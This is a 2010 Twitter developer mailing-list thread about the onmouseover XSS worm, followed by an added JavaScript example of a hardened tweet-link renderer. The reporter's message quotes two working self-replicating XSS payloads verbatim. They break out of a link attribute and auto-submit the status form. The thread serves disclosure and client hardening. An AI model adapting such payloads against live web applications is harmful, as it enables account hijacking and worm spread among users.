Patched: http://status.twitter.com/post/1161435117/xss-attack-identified-and-patched
Thanks for the warning.

Taylor

On Tue, Sep 21, 2010 at 5:21 AM, Fabian Schlenz <m...@fabianonline.de> wrote:
> Hello.
>
> There are some malicious tweets coming through in my timeline. The texts of
> these tweets are for example:
>
> http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()"
> style="color:#000;background:#000;/
>
> or
>
> http://t.co/@"onmouseover="document.getElementById('status').value='RT
> MoiMrJack';$('.status-update-form').submit();"font-size:500pt;/
>
> (so some kind of self-replicating tweet). IDs of some affected tweets:
> 25111539789, 25105308878.
>
> I do hope Twitter is already aware of this problem, since the official
> Twitter pages are affected, too... But if your client is affected, you
> should think about hardening it against this attack (mine was affected too,
> but luckily I'm the only user of it).
>
>
> Regards,
> Fabian Schlenz
>
> --
> Twitter developer documentation and resources: http://dev.twitter.com/doc
> API updates via Twitter: http://twitter.com/twitterapi
> Issues/Enhancements Tracker:
> http://code.google.com/p/twitter-api/issues/list
> Change your membership to this group:
> http://groups.google.com/group/twitter-development-talk?hl=en
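
One way a client could harden its tweet rendering against the quote-in-URL pattern reported above, as an added example that is not part of the original thread and not Twitter's code. It assumes a client that auto-links URLs by string concatenation; `renderNaive`, `renderSafe`, `anchorAttributes` and the sample tweet are hypothetical and constructed for illustration.

```javascript
// Added example; all names here are hypothetical, not Twitter's code.
// Constructed sample with the same shape as the reported tweets (harmless body).
const SAMPLE = 'look http://example.invalid/@"onmouseover="this.title=\'constructed\'"/';

// Encode the characters that can break out of HTML text or attribute context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Weak: everything up to the next space is treated as the URL and concatenated
// into href unencoded, so a double quote in the tweet ends the attribute early.
function renderNaive(text) {
  return text.replace(/https?:\/\/\S+/g, (u) => '<a href="' + u + '">' + u + '</a>');
}

// Hardened: link only a conservative URL character set and encode every piece,
// link or not, before it reaches the page.
const URL_RE = /https?:\/\/[A-Za-z0-9.-]+(?:\/[A-Za-z0-9\/._~%?=&#+-]*)?/g;

function renderSafe(text) {
  let out = '';
  let last = 0;
  for (const m of text.matchAll(URL_RE)) {
    out += escapeHtml(text.slice(last, m.index));
    const u = escapeHtml(m[0]);
    out += '<a href="' + u + '" rel="nofollow">' + u + '</a>';
    last = m.index + m[0].length;
  }
  return out + escapeHtml(text.slice(last));
}

// Check helper: list the attribute names on every <a> tag in rendered HTML.
function anchorAttributes(html) {
  const names = [];
  for (const tag of html.matchAll(/<a\s([^>]*)>/g)) {
    for (const attr of tag[1].matchAll(/([a-z-]+)="[^"]*"/gi)) {
      names.push(attr[1].toLowerCase());
    }
  }
  return names;
}

console.log('naive:', anchorAttributes(renderNaive(SAMPLE)));
console.log('safe: ', anchorAttributes(renderSafe(SAMPLE)));
```

For the sample, the weak renderer produces an `<a>` tag that carries an `onmouseover` attribute, while the hardened one produces only `href` and `rel` and leaves the rest of the tweet as encoded text.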